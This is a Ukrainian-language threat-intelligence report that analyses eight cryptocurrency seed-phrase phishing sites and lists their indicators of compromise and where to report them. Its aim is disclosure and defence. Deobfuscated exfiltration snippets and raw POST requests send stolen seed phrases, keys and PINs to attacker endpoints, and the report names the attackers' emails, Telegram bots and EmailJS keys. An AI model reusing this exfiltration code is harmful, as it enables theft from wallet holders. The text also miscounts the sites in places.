Анатомія криптофішингу:
Аналіз 8 реальних атак
Ми перехопили фішинговий трафік у реальному часі, провели реверс-інжиніринг 5 програм для викрадення початкових фраз та відстежили викрадені дані до ботів у Telegram, облікових записів EmailJS та серверних частин сервісів «фішинг як послуга».

Що ми виявили
Щодня тисячі користувачів криптовалют втрачають свої кошти через фішингові сайти, які зовні нічим не відрізняються від справжніх сервісів гаманців. Але що відбувається позаду Фальшива кнопка «Connect Wallet»? Куди насправді надходить ваша фраза-посів?
Ми перехопили поточний HTTP-трафік з 5 активних фішингових сайтів, завантажили їхній повний вихідний код і відстежили кожен канал витоку даних аж до кінцевого пункту призначення. Це розслідування розкриває всю структуру сучасного криптофішингу — від прийомів соціальної інженерії, які змушують вас вводити фразу-посів, до бота в Telegram, який передає її зловмиснику в режимі реального часу.
Усі фрази-насіння, наведені в цій статті, є тестовими даними, згенерованими у випадковому порядку. Під час цього розслідування жодні реальні облікові дані не були скомпрометовані. Про всі сайти було повідомлено відповідним хостинг-провайдерам та службам з боротьби зі зловживаннями.
Універсальна схема атаки
Незважаючи на різні бренди та серверні компоненти, усі 8 фішингових сайтів відповідають абсолютно така сама психологічна воронка:
Ключова думка: анімація «Підключення...» завжди запрограмовано так, щоб не спрацювало. У вихідному коді сайту № 4 ми виявили const success = false — спроби підключення гаманця не відбувається. Весь цей процес існує виключно для того, щоб скерувати жертв до форми «Підключити вручну».

8 об’єктів: повний огляд
Видавання себе за іншу особу
Вигаданий «децентралізований протокол» для перевірки гаманців. Для підвищення довіри використовує тикери цін CryptoCompare у режимі реального часу та посилання на справжні блокчейн-експлорери (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano). На головній сторінці розміщено понад 100 логотипів гаманців та описано 3-етапний процес «перевірки».
Подвійний ланцюг виведення інформації
Найдосконаліший бекенд із усіх п’яти — кожні викрадені облікові дані надсилаються через два незалежні канали одночасно:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) Результати аналізу OSINT
| Показник | Значення |
|---|---|
| Лист від шахрая | Bestgrace309@gmail.com |
| Бот у Telegram | @DewdropsTG_bot (ID: 7567323692) |
| Одержувач у Telegram | @metatech2 (Ідентифікатор у чаті: 7350941887) |
| Бек-енд | emailjs-backend-ovtg.onrender.com |
| Сервіс EmailJS | service_d5qigxs / template_7bqxeaa |
| Прихований домен | layerschain.in (з обфускації електронної пошти CF) |
| Надіслані повідомлення | 1 824+ (за ідентифікатором повідомлення в Telegram) |
| Вік домену | 2 дні (TLS: 25 березня 2026 року) |
Електронну адресу зловмисника було виявлено в Коментар на JavaScript всередині config.js: // Bestgrace309@gmail.com. Вони забули видалити його перед розгортанням. Крім того, сервер ретрансляції Telegram є повністю відкритим — без аутентифікації та обмеження швидкості. Шляхом декодування даних Cloudflare data-cfemail крім заплутування коду в HTML, ми також виявили прихований адрес електронної пошти: support@layerschain.in, з підключенням до індійської та південноафриканської хостингової інфраструктури.
Видавання себе за іншу особу
Ідеальне відтворення реальності на рівні пікселів Aqualibre (AQLA) сторінка міграції токенів. У коді HTML міститься тег метаданих, що вказує на джерело: data-scrapbook-source="https://token.aqla.app/migration", з датою 19 листопада 2024 року.
Підхід «без коду»
Цьому зловмиснику потрібно зовсім немає коду на стороні сервера. Ця форма надсилає дані безпосередньо на Нестатичний — легітимний бекенд для статичних сайтів. Кожне подання пересилається на електронну адресу шахрая. Електронна адреса зловмисника — це ніколи не відображається у вихідному коді.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages: безкоштовно. Un-static Forms: безкоштовно. Доменів не придбано. Серверів не орендовано. Загальна вартість інфраструктури: нуль доларів.
Видавання себе за іншу особу
Субдомен містить "safpal" — це навмисна помилка в написанні слова SafePal, популярний апаратний гаманець. Сайт видає себе за «Blockchain Wallet Rectification» із 26 фейковими категоріями новин. Використовує Typed.js для анімації назв блокчейнів (Ethereum, BSC, Polygon...) та тікер LiveCoinWatch для створення враження достовірності.
Той самий комплект, той самий оператор?
Використовує абсолютно той самий шаблон фішингового листа як об’єкт № 2:
ідентичний connect.html, ідентичний wallets.html з понад 60 логотипами, на базі того самого бекенду Un-static (з іншим ідентифікатором форми — 6f1b82c3...da9943af). Наявність ідентичного набору дає підстави припустити, що один оператор, який керує обома сайтами.
Помилки в коді: «Privay Policy» (бракує літери «c»), «seperated» (повинно бути «separated»), «Kestore» (бракує літери «y»). У полі для введення пароля використовується type="text" замість type="password".
Видавання себе за іншу особу
Майже ідеальний клон Мережа Flare портал — справжній блокчейн EVM рівня 1 із протоколами FTSO та Data Connector. Відтворює понад 30 партнерів екосистеми, навігацію та брендинг. Фавікони завантажуються з типосквоту: portal.flaremainet.com (у слові «mainnet» бракує однієї літери «n»).
Подвійне резервування EmailJS
Єдиний сайт, який використовує дві окремі облікові записи EmailJS одночасно для забезпечення відмовостійкості проти ліквідації:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) Тема електронного листа щодо кожного випадку крадіжки: "New Wallet Details from Flare".
HTML-код містить Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Захист від PPC від Lunio, а також Піксель реклами Twitter/X. Зловмисник виконує платна реклама щоб привести жертв на фішинговий сайт та відфільтрувати кліки ботів. Це не хобі — це операція, що фінансується, з аналітикою та витратами на рекламу.

Видавання себе за іншу особу
Загальна послуга «COIN NODE» / «Wallet Fix» (без зазначення конкретної марки). Авторські права «Wallet Fix 2022» — цьому шаблону набору щонайменше 4 роки. Зображення розміщені на pumpeth.com (WordPress на AWS).
«Фішинг як послуга»
Найбільш тривожна архітектура бекенду: а Багатокористувацький API на основі UUID:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... Кожен шахрай отримує власний кінцевий пункт з унікальним ідентифікатором (UUID). Центральний оператор обслуговує API, відстежує кампанії та, можливо, отримує частину вкрадених коштів. Це організоване викрадення криптовалюти — модель «фішингу як послуги».
Супутня інфраструктура (практично недіюча)
| Домен | Роль | Статус |
|---|---|---|
| api.pulseresolve.com | API для виведення даних | NXDOMAIN |
| walletissuesfix.net | Хостинг фавіконів | NXDOMAIN |
| syncwallet.online | Хостинг логотипів | NXDOMAIN |
| pumpeth.com | CDN для зображень | У режимі реального часу (AWS) |
Бекенд не працює, але фронтенд досі працює на Cloudflare Pages. Якщо зловмисник перереєструє pulseresolve.com, сайт миттєво знову починає працювати.
Видавання себе за іншу особу
A двостороння операція: загальний «Центр підтримки» за адресою wallet-support-39n.pages.dev з 15 вигаданими категоріями випусків та 39 брендами гаманців, а також Ідеальний клон процесу реєстрації в Ledger в ledger-recovery.support розміщено на Replit — із можливістю вибору моделі пристрою, налаштування PIN-коду та таблицею початкової фрази з 24 слів із справжня функція автозаповнення за алгоритмом BIP39.
Бекенд C2 для захисту від сканерів
Сторінка підтримки гаманця надсилає викрадені дані на api.uranustoken.org/log — власний C2 на базі nginx/Ubuntu за Cloudflare. Бекенд навмисно відхиляє всі запити GET (повертає код 522 «тайм-аут»), реагуючи лише на запити POST. Це означає, що сканери URL-адрес, роботи Google Safe Browsing та дослідники в галузі безпеки, які надсилають запити GET на цей кінцевий пункт, нічого не бачать — C2 здається неактивним.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} Клон Ledger запускає окремий бекенд на Express.js безпосередньо на Replit: POST /api/recovery-phrase збір {deviceId, pin, phrase}. Він повертає 400 {"error":"Invalid data provided"} у разі некоректних вхідних даних — підтвердження того, що серверна частина працює та активно перевіряється викрадені дані.
Результати аналізу OSINT
| Показник | Значення |
|---|---|
| Інтерфейс (гаманець) | wallet-support-39n.pages.dev |
| Інтерфейс (Ledger) | ledger-recovery.support (34.111.179.208) |
| C2 — серверна частина | api.uranustoken.org → nginx/1.24.0 Ubuntu |
| IP-адреси C2 | 104.21.60.163 / 172.67.198.35 (Cloudflare) |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Реєстратор | Name.com (ledger-recovery.support) |
| Розгорнуто | 9 січня 2026 р. (заголовок «Last-Modified») |
| Технологічний стек | React + Vite + Tailwind v4.1 + Framer Motion |
Пакет JS розміром 466 КБ містить повний список слів BIP39 для автозаповнення в режимі реального часу: 67 згадок слова «passphrase» та 39 — «mnemonic». Клон Ledger супроводжує жертв через той самий процес реєстрації, що й справжній пристрій Ledger — це найпереконливіша фішингова сторінка за весь час цього розслідування. Цей apiKey поле в конфігурації вказує на багатокористувацька архітектура PhaaS.
Видавання себе за іншу особу
Універсальна «децентралізована платформа для запуску» з 21 категорія приманок (стейкінг, міграція, KYC, розіграші, отримання винагород, відновлення активів, попередній продаж, випуск NFT, заблоковані облікові записи...) та Понад 70 брендів гаманців — один із найповніших списків гаманців, які нам траплялися. Характерна орфографічна помилка «Sychronize» (відсутня літера «n») викриває підробку.
Конвеєр FormSubmit Pipeline
Застосування FormSubmit.co — легальний сервіс для надсилання форм на електронну пошту. Хеш кінцевої точки a2cf4131f1a5d39453c7c183df96f86f — це MD5-хаш адреси електронної пошти шахрая. Ми перевірили методом повного перебору сотні шаблонів адрес електронної пошти в сервісах Gmail, Yahoo, Hotmail, ProtonMail, Yandex та Mail.ru — не знайдено. Шахрай використовує незвичайну або випадково згенеровану адресу електронної пошти.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); Результати аналізу OSINT
| Показник | Значення |
|---|---|
| Домен | mainnetvalidationapp.pages.dev |
| Хеш FormSubmit | a2cf4131f1a5d39453c7c183df96f86f |
| Ідентифікатор кампанії | DAPP — ДЕЦЕНТРАЛІЗОВАНИЙ |
| Набір FontAwesome | bdc3291137 (комплект № 112310842, безкоштовна версія 6.7.2) |
| jQuery | 3.2.1 + 3.5.1 завантажуються одночасно |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (несумісність) |
Набір FontAwesome bdc3291137 — FontAwesome може визначити власника облікового запису, пов’язаного з цим ідентифікатором набору. Тег кампанії DAPP DECENTRALIZED може з’являтися на інших фішингових сайтах, що використовують той самий хеш FormSubmit. Після викрадення початкової фрази, підроблений QR-код і випадковий 7-символьний код посилання відображається повідомлення: «Зверніться до адміністратора, вказавши свій унікальний реф-код» — змушуючи жертв чекати, замість того щоб проводити розслідування.
Видавання себе за іншу особу
Невідомо — і фронтенд, і бекенд перебувають у режимі офлайн. Судячи зі структури корисного навантаження, це була програма для викрадення фраз-посівів криптовалютних гаманців. Ця Публічний контейнер Cloudflare R2 (об'єктне сховище, а не Pages) — це добре задокументований вектор фішингу за даними компанії Netskope, було виявлено понад 5 000 шкідливих сторінок, а обсяг трафіку зріс у 61 разів.
Налаштування для «скрипт-кідді»
Найбільш примітивна операція у цій колекції. Фрази-насіння надсилаються слово за словом до PHP-скрипта, що працює на домашньому комп’ютері або VPS, підключеному через безкоштовну службу динамічного DNS:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access Результати аналізу OSINT
| Показник | Значення |
|---|---|
| Інтерфейс користувача | pub-519769e9eb634616b1746c2018641d56.r2.dev [ОФЛАЙН] |
| Бек-енд | mercifuljigga4real123.publicvm.com [NXDOMAIN] |
| Ідентифікатор відра R2 | 519769e9eb634616b1746c2018641d56 |
| Провайдер DDNS | DNSExit.com / Netdorm, Inc. (Цинциннаті, штат Огайо) |
| DNS NS | ns10–13.dnsexit.com |
| Ім'я користувача | mercifuljigga4real123 |
«Merciful» + «jigga» (прізвисько Джей-Зі) + «4real» + «123» — цілком особистий нік, що свідчить про прихильність до хіп-хоп-культури. Не знайдено на будь-якій платформі, що індексується: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch або Steam. Ймовірно, веде активність у Discord, Telegram або на ігрових платформах під цим ім’ям або його близькими варіантами. Ім’я файлу fuc.php відповідає нестандартному стилю ручки.
7 способів викрасти вашу фразу-насіння

| Метод | Сайти | Як це працює | Швидкість | Вартість |
|---|---|---|---|---|
| Бот у Telegram | #1 | Express.js на Render.com використовує проксі-сервер для підключення до Bot API. Шахрай миттєво отримує приватне повідомлення з обліковими даними. | У режимі реального часу | $0 |
| EmailJS | #1, #4 | JavaScript на стороні клієнта надсилає дані безпосередньо до API EmailJS, який, у свою чергу, доставляє їх на електронну пошту шахрая. | ~1 хв | $0 |
| Нестатичні форми | #2, #3 | Стандартна HTML-форма з методом POST, що надсилає дані до легітимного сервісу обробки форм, який пересилає отримані дані електронною поштою. | ~1 хв | $0 |
| FormSubmit.co | #7 | jQuery AJAX на FormSubmit.co. Адреса електронної пошти прихована за хешем MD5. Кампанія позначена тегом «DAPP DECENTRALIZED». | ~1 хв | $0 |
| Налаштоване API C2 | #6 | React SPA надсилає запити до API nginx/Express, що працює за Cloudflare. Відхиляє GET-запити (522) для уникнення сканерів. Відповідає лише на запити POST. | У режимі реального часу | ~5 доларів на місяць |
| PHP + DDNS | #8 | PHP-скрипт на домашньому комп’ютері через безкоштовну службу динамічного DNS (publicvm.com). Фраза-насіння надсилається слово за словом. | У режимі реального часу | $0 |
| API PhaaS | #5 | Багатокористувацький API на основі UUID. Центральний оператор управляє серверною частиною, а шахраї орендують кінцеві точки. | У режимі реального часу | Невідомо |
7 тривожних ознак, що викривають будь-який фішинговий сайт
Якщо ви побачите будь-який якщо це так, негайно закрийте вкладку:
Справжні підключення до гаманців здійснюються за допомогою протоколу WalletConnect або розширень для браузера. Вони ніколи не відображають помилку «Помилка підключення», яка вимагає ввести фразу-насіння.
Кожна іконка гаманця веде до однієї й тієї ж форми. Справжній сервіс інтегрував би власний SDK кожного гаманця.
Фальшива «Помилка 503» або «Невідома помилка», що з’являється після відправлення, є навмисною. Ваші дані вже вкрадено — ця помилка змушує вас спробувати ще раз, використовуючи інший гаманець.
Усі 5 сайтів зловживають безкоштовним тарифом Cloudflare Pages. Перевірка особи не потрібна. У 2025 році кількість випадків фішингового зловживання Cloudflare Pages зросла на 198%.
Жодна легітимна служба не вимагає всіх трьох типів облікових даних. Ця форма з трьома вкладками є характерною ознакою фішингового набору.
Жоден із цих сайтів не завантажується ethers.js, web3.js, або здійснювати будь-які RPC-виклики. Це звичайні HTML-форми, які лише імітують dApps.
Безкоштовний хостинг + безкоштовні сервіси для створення форм + безкоштовний обмін повідомленнями = повноцінна фішингова операція за 0 доларів. Якщо сайт не має справжнього домену, будьте обережні.
Повна таблиця IOC
Для команд з безпеки, платформ з аналітики загроз та осіб, які повідомляють про зловживання:
Домени та інфраструктура
| Домен | Тип | Статус |
|---|---|---|
| networklayers.pages.dev | Інтерфейс фішингового сайту | Наживо |
| token-aqla.pages.dev | Інтерфейс фішингового сайту | Наживо |
| antiresolve-mysafpalnode.pages.dev | Інтерфейс фішингового сайту | Наживо |
| flaremainnet.pages.dev | Інтерфейс фішингового сайту | Наживо |
| swiftauthapps.pages.dev | Інтерфейс фішингового сайту | Наживо |
| emailjs-backend-ovtg.onrender.com | Бекенд реле TG | Наживо |
| portal.flaremainet.com | Ресурси, пов’язані з типосквотингом | Невідомо |
| layerschain.in | Пов’язаний домен | DNS не працює |
| api.pulseresolve.com | Бек-енд PhaaS | NXDOMAIN |
| walletissuesfix.net | Хост активів | NXDOMAIN |
| syncwallet.online | Хостинг логотипів | NXDOMAIN |
| pumpeth.com | CDN для зображень | У режимі реального часу (AWS) |
| wallet-support-39n.pages.dev | Інтерфейс фішингового сайту | Наживо |
| ledger-recovery.support | Фішинг у Ledger (Replit) | Наживо |
| api.uranustoken.org | Бекенд C2 (nginx/Ubuntu) | Наживо |
| uranustoken.org | Кореневий домен | 404 |
| mainnetvalidationapp.pages.dev | Інтерфейс фішингового сайту | Наживо |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Фішинг (категорія R2) | Офлайн |
| mercifuljigga4real123.publicvm.com | PHP-бекенд (DDNS) | NXDOMAIN |
Облікові записи та ідентифікатори
| Тип | Значення | Сайт |
|---|---|---|
| Електронна пошта | Bestgrace309@gmail.com | #1 |
| Електронна пошта (приховано) | support@layerschain.in | #1 |
| Бот у Telegram | @DewdropsTG_bot (7567323692) | #1 |
| Користувач Telegram | @metatech2 (7350941887) | #1 |
| EmailJS № 1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS № 2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS № 3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Нестатична форма | c78173e2d991...94c3f76 | #2 |
| Нестатична форма | 6f1b82c3ce55...da9943af | #3 |
| UUID PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Інстанція візуалізації | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| MD5-сума перевірки форми | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Теги кампанії | DAPP — ДЕЦЕНТРАЛІЗОВАНИЙ | #7 |
| Набір FontAwesome | bdc3291137 (комплект № 112310842) | #7 |
| Ідентифікатор відра R2 | 519769e9eb634616b1746c2018641d56 | #8 |
| Ім'я користувача/DDNS | mercifuljigga4real123 | #8 |
Куди повідомляти про фішинг, пов’язаний з криптовалютами

| Послуги | Про що слід повідомляти | Як |
|---|---|---|
| Cloudflare | 7 облікових записів .pages.dev + 1 контейнер R2 | abuse.cloudflare.com |
| Google Safe Browsing | Усі фішингові URL-адреси | Повідомити про фішинг |
| PhishTank | Усі URL-адреси для списку заблокованих користувачів спільноти | phishtank.org |
| EmailJS | 3 облікові записи, що зазнали зловживання (ідентифікатори сервісу вказано вище) | abuse@emailjs.com |
| Нестатичний | 2 кінцеві точки форми | Зв’яжіться з нами через un-static.com |
| Render.com | Бекенд ретрансляції Telegram | Відправити форму про зловживання |
| Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Повідомлення про зловживання в Google |
| Twitter/X | Рекламний обліковий запис для просування сайту № 4 | X: Повідомити про зловживання в рекламі |
| FormSubmit.co | Хеш a2cf4131... (#7) | Форма для повідомлення про зловживання FormSubmit |
| Replit | ledger-recovery.support (#6) | Повідомлення про зловживання в Replit |
| Name.com | Реєстратор для сайту ledger-recovery.support | Зловживання на сайті Name.com |
| DNSExit | mercifuljigga4real123.publicvm.com | Зловживання на сайті dnsexit.com |
| FontAwesome | Комплект bdc3291137 (№ 7) | Зловживання FontAwesome |
| Chainabuse | Усі фішингові кампанії | Chainabuse.com |
Як захистити себе
Жодна надійна служба ніколи не попросить вас ввести вашу фразу-насіння на веб-сайті. Фрази-насіння вводяться виключно в офіційне програмне забезпечення гаманця під час його відновлення — ні в якому разі не на сторонніх веб-сайтах, що пропонують послуги «перевірки», «синхронізації» чи «відновлення».
Перед підключенням будь-якого гаманця:
- Переконайтеся, що URL-адреса відповідає офіційному домену. Перевірте дані SSL-сертифіката.
- Справжній WalletConnect використовує QR-код або глибоке посилання — ніколи не використовує форму «сід-фрази».
- Якщо «підключення не вдалося» і вас просять ввести облікові дані вручну — це фішинг.
- Перевірте підозрілі URL-адреси на PhishTank або VirusTotal перед тим, як почати спілкування.
- Використовуйте апаратний гаманець — він вимагає фізичного підтвердження кожної транзакції.
- Додавайте офіційні URL-адреси до закладок. Ніколи не переходьте за посиланнями з реклами, приватних повідомлень або соціальних мереж.
Таксономія криптофішингу
Злодії фраз-посівів — це лише одна з категорій. Ось повна картина фішингу в сфері криптовалют — ми будемо додавати детальні огляди кожного типу.
Неприємна правда
Витрати на організацію фішингової операції з криптовалютою $0 і займає менше 30 хвилин. Безкоштовний хостинг, сервіси для створення форм, безкоштовні боти для обміну повідомленнями. Зловмисник, який стоїть за сайтом № 1, вже викрав облікові дані з 1 824+ жертв. Сайт № 4 працює платна реклама у відповідному масштабі. Це не аматорство — це ціла галузь. Єдиний захист — це обізнаність.
Допоможіть нам дати відсіч
PhishDestroy відстежує та повідомляє про криптофішингові сайти в режимі реального часу. Якщо ви натрапили на підозрілий сайт, повідомте нам про це — ми проведемо розслідування та докладемо зусиль, щоб його закрили.



